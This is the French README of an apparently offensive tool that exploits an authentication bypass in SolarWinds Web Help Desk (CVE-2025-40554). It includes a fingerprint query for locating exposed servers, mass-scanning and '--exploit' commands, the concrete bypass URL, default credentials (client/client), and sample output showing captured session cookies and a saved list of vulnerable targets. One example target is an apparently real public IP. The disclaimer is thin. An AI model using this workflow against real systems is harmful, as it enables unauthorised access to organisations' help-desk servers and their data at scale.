
CVE-2025-40554 Exploitation
Un outil complet de test de sécurité pour détecter et exploiter la vulnérabilité de contournement d'authentification (CVE-2025-40554 / CVE-2025-40536) dans SolarWinds Web Help Desk.
À DES FINS ÉDUCATIVES ET DE TEST DE SÉCURITÉ AUTORISÉ UNIQUEMENT
Cet outil est fourni pour la recherche en sécurité, les tests d'intrusion et l'évaluation de vulnérabilités sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs ne sont pas responsables de l'utilisation abusive ou des dommages causés par cet outil.
CVE-2025-40554 est une vulnérabilité critique de contournement d'authentification dans SolarWinds Web Help Desk qui permet à des attaquants non authentifiés de :
Vérifiez par vous-même :)
Dépendances :
# Clonez ou téléchargez le script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Rendez-le exécutable
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# Vérification simple de la vulnérabilité
python3 CVE-2025-40554.py -t https://cible:8443
# Avec protocole explicite
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# Exploitation complète avec énumération de session
python3 CVE-2025-40554.py -t https://cible:8443 --exploit
# Ignorer le test des identifiants par défaut
python3 CVE-2025-40554.py -t https://cible:8443 --exploit --no-login
# Scanner plusieurs cibles à partir d'un fichier
python3 CVE-2025-40554.py -l cibles.txt
# Analyse en masse avec exploitation
python3 CVE-2025-40554.py -l cibles.txt --exploit
# Mode silencieux (sortie minimale)
python3 CVE-2025-40554.py -l cibles.txt -q
# Fichier de sortie personnalisé
python3 CVE-2025-40554.py -l cibles.txt -o resultats.txt
cibles.txt :
https://cible1:8443
https://cible2.exemple.com:8443
192.168.1.100:8443
cible3.local:8443
# Les commentaires sont pris en charge
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ Authentication Bypass Exploitation Tool ║
║ Research & Educational Purposes Only ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Cible : https://203.106.221.203:8443
======================================================================
[*] Étape 1 : Établissement de la session...
[+] WOSID extrait : AbCdEfGhIjKlMnOpQrStU
[+] Jeton XSRF : abc123-def456-ghi789
[*] Étape 2 : Test du contournement d'authentification...
[+] Indicateurs de contournement trouvés : externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNÉRABLE - Contournement d'authentification confirmé !
[*] Étape 3 : Test des identifiants par défaut (client/client)...
[+] SUCCÈS - Les identifiants par défaut fonctionnent !
======================================================================
MODE EXPLOITATION - Contournement d'authentification CVE-2025-40554
======================================================================
[*] URL de contournement : https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Déclenchement du contournement d'authentification...
[+] Contournement d'authentification réussi !
[*] Cookies de session :
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
RÉSUMÉ
======================================================================
[+] La cible est VULNÉRABLE à CVE-2025-40554
[+] Identifiants par défaut : FONCTIONNENT
======================================================================
[*] 5 cibles uniques chargées depuis cibles.txt
[*] Mode : Contournement + test des identifiants par défaut
[*] Exploitation complète activée
[1/5] Test de https://cible1:8443
[+] VULNÉRABLE - Contournement d'authentification confirmé !
[+] SUCCÈS - Les identifiants par défaut fonctionnent !
[2/5] Test de https://cible2:8443
[!] NON VULNÉRABLE - Échec du contournement d'authentification
...
======================================================================
RÉSUMÉ DE L'ANALYSE
======================================================================
Total scanné : 5/5
Vulnérables : 2
Avec identifiants par défaut : 1
======================================================================
[+] Résultats enregistrés dans : vulnerable_targets.txt
Établissement de session
Contournement d'authentification
Test des identifiants (optionnel)
Exploitation complète (mode --exploit)
L'outil détecte un contournement réussi en vérifiant la présence de :
externalAuthContainer - Configuration d'authentification externeJSONRpcClient - Exposition du client APISAML 2.0 - Configuration SSOLoginPref - Paramètres de préférence de connexionauthMode - Paramètres de mode d'authentificationLes contributions sont les bienvenues.....
Cet outil est fourni "en l'état" sans garantie d'aucune sorte. Utilisez-le à vos risques et périls.
Skynoxk
Rappel : Piratez toujours de manière éthique et légale. L'accès non autorisé est un crime.
| Option | Description |
|---|
-t, --target URL | URL cible unique à tester |
-l, --list FILE | Fichier contenant la liste des cibles (une par ligne) |
--exploit | Activer le mode exploitation complète avec énumération |
--no-login | Ignorer le test des identifiants par défaut |
-o, --output FILE | Fichier de sortie pour les cibles vulnérables (par défaut : vulnerable_targets.txt) |
-q, --quiet | Mode sortie minimale (utile pour les analyses en masse) |